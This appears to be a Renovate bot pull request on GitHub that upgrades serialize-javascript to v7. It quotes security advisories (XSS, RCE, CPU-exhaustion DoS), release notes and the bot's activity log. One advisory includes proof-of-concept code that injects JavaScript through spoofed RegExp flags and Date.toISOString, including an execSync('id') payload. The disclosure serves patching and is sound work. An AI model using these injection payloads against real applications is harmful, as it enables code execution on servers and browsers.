Skip to content

fix(deps): update dependency serialize-javascript to v7 [security]#296

Open
renovate[bot] wants to merge 1 commit into
masterfrom
renovate/npm-serialize-javascript-vulnerability
Open

fix(deps): update dependency serialize-javascript to v7 [security]#296
renovate[bot] wants to merge 1 commit into
masterfrom
renovate/npm-serialize-javascript-vulnerability

Conversation

@renovate

@renovate renovate Bot commented Feb 18, 2025
edited
Loading

Copy link
Copy Markdown

This PR contains the following updates:

Package Change Age Confidence
serialize-javascript ^6.0.0^7.0.0 age confidence

Cross-site Scripting (XSS) in serialize-javascript

CVE-2024-11831 / GHSA-76p7-773f-r4q5

More information

Details

A flaw was found in npm-serialize-javascript. The vulnerability occurs because the serialize-javascript module does not properly sanitize certain inputs, such as regex or other JavaScript object types, allowing an attacker to inject malicious code. This code could be executed when deserialized by a web browser, causing Cross-site scripting (XSS) attacks. This issue is critical in environments where serialized data is sent to web clients, potentially compromising the security of the website or web application using this package.

Severity

  • CVSS Score: 5.4 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString()

GHSA-5c6j-r48x-rmvq

More information

Details

Impact

The serialize-javascript npm package (versions <= 7.0.2) contains a code injection vulnerability. It is an incomplete fix for CVE-2020-7660.

While RegExp.source is sanitized, RegExp.flags is interpolated directly into the generated output without escaping. A similar issue exists in Date.prototype.toISOString().

If an attacker can control the input object passed to serialize(), they can inject malicious JavaScript via the flags property of a RegExp object. When the serialized string is later evaluated (via eval, new Function, or <script> tags), the injected code executes.

const serialize = require('serialize-javascript');
// Create an object that passes instanceof RegExp with a spoofed .flags
const fakeRegex = Object.create(RegExp.prototype);
Object.defineProperty(fakeRegex, 'source', { get: () => 'x' });
Object.defineProperty(fakeRegex, 'flags', {
  get: () => '"+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"'
});
fakeRegex.toJSON = function() { return '@&#8203;placeholder'; };
const output = serialize({ re: fakeRegex });
// Output: {"re":new RegExp("x", ""+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"")}
let obj;
eval('obj = ' + output);
console.log(global.PWNED); // "CODE_INJECTION_VIA_FLAGS" — injected code executed!

#h2. PoC 2: Code Injection via Date.toISOString()
const serialize = require('serialize-javascript');
const fakeDate = Object.create(Date.prototype);
fakeDate.toISOString = function() { return '"+(global.DATE_PWNED="DATE_INJECTION")+"'; };
fakeDate.toJSON = function() { return '2024-01-01'; };
const output = serialize({ d: fakeDate });
// Output: {"d":new Date(""+(global.DATE_PWNED="DATE_INJECTION")+"")}
eval('obj = ' + output);
console.log(global.DATE_PWNED); // "DATE_INJECTION" — injected code executed!

#h2. PoC 3: Remote Code Execution
const serialize = require('serialize-javascript');
const rceRegex = Object.create(RegExp.prototype);
Object.defineProperty(rceRegex, 'source', { get: () => 'x' });
Object.defineProperty(rceRegex, 'flags', {
  get: () => '"+require("child_process").execSync("id").toString()+"'
});
rceRegex.toJSON = function() { return '@&#8203;rce'; };
const output = serialize({ re: rceRegex });
// Output: {"re":new RegExp("x", ""+require("child_process").execSync("id").toString()+"")}
// When eval'd on a Node.js server, executes the "id" system command
Patches

The fix has been published in version 7.0.3. https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3

Severity

  • CVSS Score: 8.1 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Serialize JavaScript has CPU Exhaustion Denial of Service via crafted array-like objects

CVE-2026-34043 / GHSA-qj8w-gfj5-8c6v

More information

Details

Impact

What kind of vulnerability is it?

It is a Denial of Service (DoS) vulnerability caused by CPU exhaustion. When serializing a specially crafted "array-like" object (an object that inherits from Array.prototype but has a very large length property), the process enters an intensive loop that consumes 100% CPU and hangs indefinitely.

Who is impacted?

Applications that use serialize-javascript to serialize untrusted or user-controlled objects are at risk. While direct exploitation is difficult, it becomes a high-priority threat if the application is also vulnerable to Prototype Pollution or handles untrusted data via YAML Deserialization, as these could be used to inject the malicious object.

Patches

Has the problem been patched?

Yes, the issue has been patched by replacing instanceof Array checks with Array.isArray() and using Object.keys() for sparse array detection.

What versions should users upgrade to?

Users should upgrade to v7.0.5 or later.

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

There is no direct code-level workaround within the library itself. However, users can mitigate the risk by:

  • Validating and sanitizing all input before passing it to the serialize() function.
  • Ensuring the environment is protected against Prototype Pollution.
  • Upgrading to v7.0.5 as soon as possible.
Acknowledgements

Serialize JavaScript thanks Tomer Aberbach (@​TomerAberbach) for discovering and privately disclosing this issue.

Severity

  • CVSS Score: 5.9 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Release Notes

yahoo/serialize-javascript (serialize-javascript)

v7.0.5

Compare Source

Fixes
  • Improve robustness and validation for array-like object serialization.
  • Fix an issue where certain object structures could lead to excessive CPU usage.

For more details, please see GHSA-qj8w-gfj5-8c6v.

v7.0.4

Compare Source

What's Changed

Full Changelog: yahoo/serialize-javascript@v7.0.3...v7.0.4

v7.0.3

Compare Source

v7.0.2

Compare Source

What's Changed

Full Changelog: yahoo/serialize-javascript@v7.0.1...v7.0.2

v7.0.1

Compare Source

What's Changed

New Contributors

Full Changelog: yahoo/serialize-javascript@v7.0.0...v7.0.1

v7.0.0

Compare Source

Breaking Changes

  • requires Node.js v20+

What's Changed

New Contributors

Full Changelog: yahoo/serialize-javascript@v6.0.2...v7.0.0

v6.0.2

Compare Source

v6.0.1

Compare Source

What's Changed

New Contributors

Full Changelog: yahoo/serialize-javascript@v6.0.0...v6.0.1

Configuration

📅 Schedule: (UTC)

  • Branch creation
    • At any time (no schedule defined)
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate Bot changed the title fix(deps): update dependency serialize-javascript to v6.0.2 [security] chore(deps): update dependency serialize-javascript to v6.0.2 [security] Sep 25, 2025
@renovate renovate Bot force-pushed the renovate/npm-serialize-javascript-vulnerability branch from 5da1f82 to 37ecf52 Compare October 21, 2025 11:48
@renovate renovate Bot changed the title chore(deps): update dependency serialize-javascript to v6.0.2 [security] fix(deps): update dependency serialize-javascript to v7 [security] Mar 2, 2026
@renovate renovate Bot force-pushed the renovate/npm-serialize-javascript-vulnerability branch 2 times, most recently from 73246fc to 828f0c1 Compare March 5, 2026 19:10
@renovate renovate Bot changed the title fix(deps): update dependency serialize-javascript to v7 [security] fix(deps): update dependency serialize-javascript to v7 [security] - autoclosed Mar 27, 2026
@renovate renovate Bot closed this Mar 27, 2026
@renovate renovate Bot deleted the renovate/npm-serialize-javascript-vulnerability branch March 27, 2026 01:38
@renovate renovate Bot changed the title fix(deps): update dependency serialize-javascript to v7 [security] - autoclosed fix(deps): update dependency serialize-javascript to v7 [security] Mar 29, 2026
@renovate renovate Bot reopened this Mar 29, 2026
@renovate renovate Bot force-pushed the renovate/npm-serialize-javascript-vulnerability branch 2 times, most recently from 828f0c1 to 9420d98 Compare March 29, 2026 01:44
@renovate renovate Bot changed the title fix(deps): update dependency serialize-javascript to v7 [security] fix(deps): update dependency serialize-javascript to v7 [security] - autoclosed Apr 27, 2026
@renovate renovate Bot closed this Apr 27, 2026
@renovate renovate Bot changed the title fix(deps): update dependency serialize-javascript to v7 [security] - autoclosed fix(deps): update dependency serialize-javascript to v7 [security] Apr 27, 2026
@renovate renovate Bot reopened this Apr 27, 2026
@renovate renovate Bot force-pushed the renovate/npm-serialize-javascript-vulnerability branch 2 times, most recently from 9420d98 to d38649e Compare April 27, 2026 21:48
@renovate renovate Bot force-pushed the renovate/npm-serialize-javascript-vulnerability branch from d38649e to 9c0a250 Compare June 11, 2026 20:15
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

0 participants